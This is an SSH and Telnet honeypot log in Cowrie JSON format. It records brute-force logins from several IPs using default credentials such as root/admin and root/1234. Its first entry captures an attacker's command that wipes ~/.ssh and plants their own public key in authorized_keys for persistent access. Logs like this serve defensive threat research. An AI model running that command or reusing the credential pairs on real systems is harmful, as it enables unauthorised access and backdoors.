{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T06:37:28.163310Z","src_ip":"157.20.207.165","session":"3d95f0964e3e"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T06:37:28.350113Z","src_ip":"157.20.207.165","session":"3d95f0964e3e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:37:28.351205Z","src_ip":"157.20.207.165","session":"3d95f0964e3e"}
{"eventid":"cowrie.session.connect","src_ip":"157.20.207.165","src_port":45650,"dst_ip":"1.2.3.4","dst_port":22,"session":"a2901331b386","protocol":"ssh","message":"New connection: 157.20.207.165:45650 (1.2.3.4:22) [session: a2901331b386]","sensor":"my-vps","timestamp":"2025-09-09T06:37:28.532909Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:37:28.533813Z","src_ip":"157.20.207.165","session":"a2901331b386"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:37:28.717983Z","src_ip":"157.20.207.165","session":"a2901331b386"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T06:37:29.494236Z","src_ip":"157.20.207.165","session":"a2901331b386"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:37:30.680788Z","src_ip":"157.20.207.165","session":"a2901331b386"}
{"eventid":"cowrie.session.connect","src_ip":"157.20.207.165","src_port":45658,"dst_ip":"1.2.3.4","dst_port":22,"session":"3d8ed904a509","protocol":"ssh","message":"New connection: 157.20.207.165:45658 (1.2.3.4:22) [session: 3d8ed904a509]","sensor":"my-vps","timestamp":"2025-09-09T06:37:30.862873Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:37:30.863537Z","src_ip":"157.20.207.165","session":"3d8ed904a509"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:37:31.047588Z","src_ip":"157.20.207.165","session":"3d8ed904a509"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:37:31.829832Z","src_ip":"157.20.207.165","session":"3d8ed904a509"}
{"eventid":"cowrie.session.closed","duration":"5.8","message":"Connection lost after 5.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:37:32.017091Z","src_ip":"157.20.207.165","session":"3d95f0964e3e"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:37:32.018303Z","src_ip":"157.20.207.165","session":"3d8ed904a509"}
{"eventid":"cowrie.session.connect","src_ip":"118.26.39.178","src_port":45488,"dst_ip":"1.2.3.4","dst_port":22,"session":"9ed68b23e79a","protocol":"ssh","message":"New connection: 118.26.39.178:45488 (1.2.3.4:22) [session: 9ed68b23e79a]","sensor":"my-vps","timestamp":"2025-09-09T06:37:32.371814Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:37:32.372738Z","src_ip":"118.26.39.178","session":"9ed68b23e79a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:37:32.626919Z","src_ip":"118.26.39.178","session":"9ed68b23e79a"}
{"eventid":"cowrie.login.failed","username":"test","password":"123123","message":"login attempt [test/123123] failed","sensor":"my-vps","timestamp":"2025-09-09T06:37:34.106196Z","src_ip":"118.26.39.178","session":"9ed68b23e79a"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:37:35.364047Z","src_ip":"118.26.39.178","session":"9ed68b23e79a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56080,"dst_ip":"1.2.3.4","dst_port":22,"session":"b80fc34e77d9","protocol":"ssh","message":"New connection: 212.227.235.229:56080 (1.2.3.4:22) [session: b80fc34e77d9]","sensor":"my-vps","timestamp":"2025-09-09T06:38:00.034136Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:38:00.035119Z","src_ip":"212.227.235.229","session":"b80fc34e77d9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:38:00.119384Z","src_ip":"212.227.235.229","session":"b80fc34e77d9"}
{"eventid":"cowrie.login.failed","username":"gitlab","password":"gitlab.123","message":"login attempt [gitlab/gitlab.123] failed","sensor":"my-vps","timestamp":"2025-09-09T06:38:00.501868Z","src_ip":"212.227.235.229","session":"b80fc34e77d9"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:38:01.588240Z","src_ip":"212.227.235.229","session":"b80fc34e77d9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48494,"dst_ip":"1.2.3.4","dst_port":23,"session":"ee7b1a46ca86","protocol":"telnet","message":"New connection: 212.227.125.160:48494 (1.2.3.4:23) [session: ee7b1a46ca86]","sensor":"my-vps","timestamp":"2025-09-09T06:38:16.044023Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:38:16.128857Z","src_ip":"212.227.125.160","session":"ee7b1a46ca86"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:38:16.194916Z","src_ip":"212.227.125.160","session":"ee7b1a46ca86"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51940,"dst_ip":"1.2.3.4","dst_port":22,"session":"4dc17aa0fe22","protocol":"ssh","message":"New connection: 212.227.235.229:51940 (1.2.3.4:22) [session: 4dc17aa0fe22]","sensor":"my-vps","timestamp":"2025-09-09T06:38:20.956893Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:38:20.957666Z","src_ip":"212.227.235.229","session":"4dc17aa0fe22"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:38:21.072859Z","src_ip":"212.227.235.229","session":"4dc17aa0fe22"}
{"eventid":"cowrie.login.failed","username":"stack","password":"2025","message":"login attempt [stack/2025] failed","sensor":"my-vps","timestamp":"2025-09-09T06:38:21.555576Z","src_ip":"212.227.235.229","session":"4dc17aa0fe22"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:38:22.666812Z","src_ip":"212.227.235.229","session":"4dc17aa0fe22"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60708,"dst_ip":"1.2.3.4","dst_port":22,"session":"d023dba84863","protocol":"ssh","message":"New connection: 212.227.235.229:60708 (1.2.3.4:22) [session: d023dba84863]","sensor":"my-vps","timestamp":"2025-09-09T06:38:32.364077Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:38:33.480612Z","src_ip":"212.227.235.229","session":"d023dba84863"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:38:33.481819Z","src_ip":"212.227.235.229","session":"d023dba84863"}
{"eventid":"cowrie.login.failed","username":"default","password":"default","message":"login attempt [default/default] failed","sensor":"my-vps","timestamp":"2025-09-09T06:38:34.460104Z","src_ip":"212.227.235.229","session":"d023dba84863"}
{"eventid":"cowrie.session.connect","src_ip":"157.20.207.165","src_port":36444,"dst_ip":"1.2.3.4","dst_port":22,"session":"a54bfd372fcb","protocol":"ssh","message":"New connection: 157.20.207.165:36444 (1.2.3.4:22) [session: a54bfd372fcb]","sensor":"my-vps","timestamp":"2025-09-09T06:38:34.876101Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:38:34.877041Z","src_ip":"157.20.207.165","session":"a54bfd372fcb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:38:35.060530Z","src_ip":"157.20.207.165","session":"a54bfd372fcb"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:38:35.705062Z","src_ip":"212.227.235.229","session":"d023dba84863"}
{"eventid":"cowrie.login.failed","username":"jake","password":"jake@123","message":"login attempt [jake/jake@123] failed","sensor":"my-vps","timestamp":"2025-09-09T06:38:35.838816Z","src_ip":"157.20.207.165","session":"a54bfd372fcb"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:38:37.026020Z","src_ip":"157.20.207.165","session":"a54bfd372fcb"}
{"eventid":"cowrie.session.connect","src_ip":"118.26.39.178","src_port":50360,"dst_ip":"1.2.3.4","dst_port":22,"session":"cd21787ccbde","protocol":"ssh","message":"New connection: 118.26.39.178:50360 (1.2.3.4:22) [session: cd21787ccbde]","sensor":"my-vps","timestamp":"2025-09-09T06:38:48.356802Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:38:48.357888Z","src_ip":"118.26.39.178","session":"cd21787ccbde"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:38:48.569966Z","src_ip":"118.26.39.178","session":"cd21787ccbde"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"admin1234","message":"login attempt [ftpuser/admin1234] failed","sensor":"my-vps","timestamp":"2025-09-09T06:38:49.452750Z","src_ip":"118.26.39.178","session":"cd21787ccbde"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57910,"dst_ip":"1.2.3.4","dst_port":23,"session":"af4e645e5cd4","protocol":"telnet","message":"New connection: 212.227.235.229:57910 (1.2.3.4:23) [session: af4e645e5cd4]","sensor":"my-vps","timestamp":"2025-09-09T06:38:49.729860Z"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin","message":"login attempt [admin/admin] failed","sensor":"my-vps","timestamp":"2025-09-09T06:38:50.526090Z","src_ip":"212.227.235.229","session":"af4e645e5cd4"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:38:50.666328Z","src_ip":"118.26.39.178","session":"cd21787ccbde"}
{"eventid":"cowrie.session.closed","duration":1.0940146446228027,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:38:50.823809Z","src_ip":"212.227.235.229","session":"af4e645e5cd4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57914,"dst_ip":"1.2.3.4","dst_port":23,"session":"d93ca94dde2b","protocol":"telnet","message":"New connection: 212.227.235.229:57914 (1.2.3.4:23) [session: d93ca94dde2b]","sensor":"my-vps","timestamp":"2025-09-09T06:38:51.227901Z"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-09-09T06:38:52.014283Z","src_ip":"212.227.235.229","session":"d93ca94dde2b"}
{"eventid":"cowrie.session.closed","duration":1.191878080368042,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:38:52.419707Z","src_ip":"212.227.235.229","session":"d93ca94dde2b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57920,"dst_ip":"1.2.3.4","dst_port":23,"session":"1b40944452a0","protocol":"telnet","message":"New connection: 212.227.235.229:57920 (1.2.3.4:23) [session: 1b40944452a0]","sensor":"my-vps","timestamp":"2025-09-09T06:38:52.731603Z"}
{"eventid":"cowrie.login.success","username":"root","password":"1234","message":"login attempt [root/1234] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:38:53.429371Z","src_ip":"212.227.235.229","session":"1b40944452a0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:38:53.451406Z","src_ip":"212.227.235.229","session":"1b40944452a0"}
{"eventid":"cowrie.command.input","input":"uname -m","message":"CMD: uname -m","sensor":"my-vps","timestamp":"2025-09-09T06:38:53.817987Z","src_ip":"212.227.235.229","session":"1b40944452a0"}
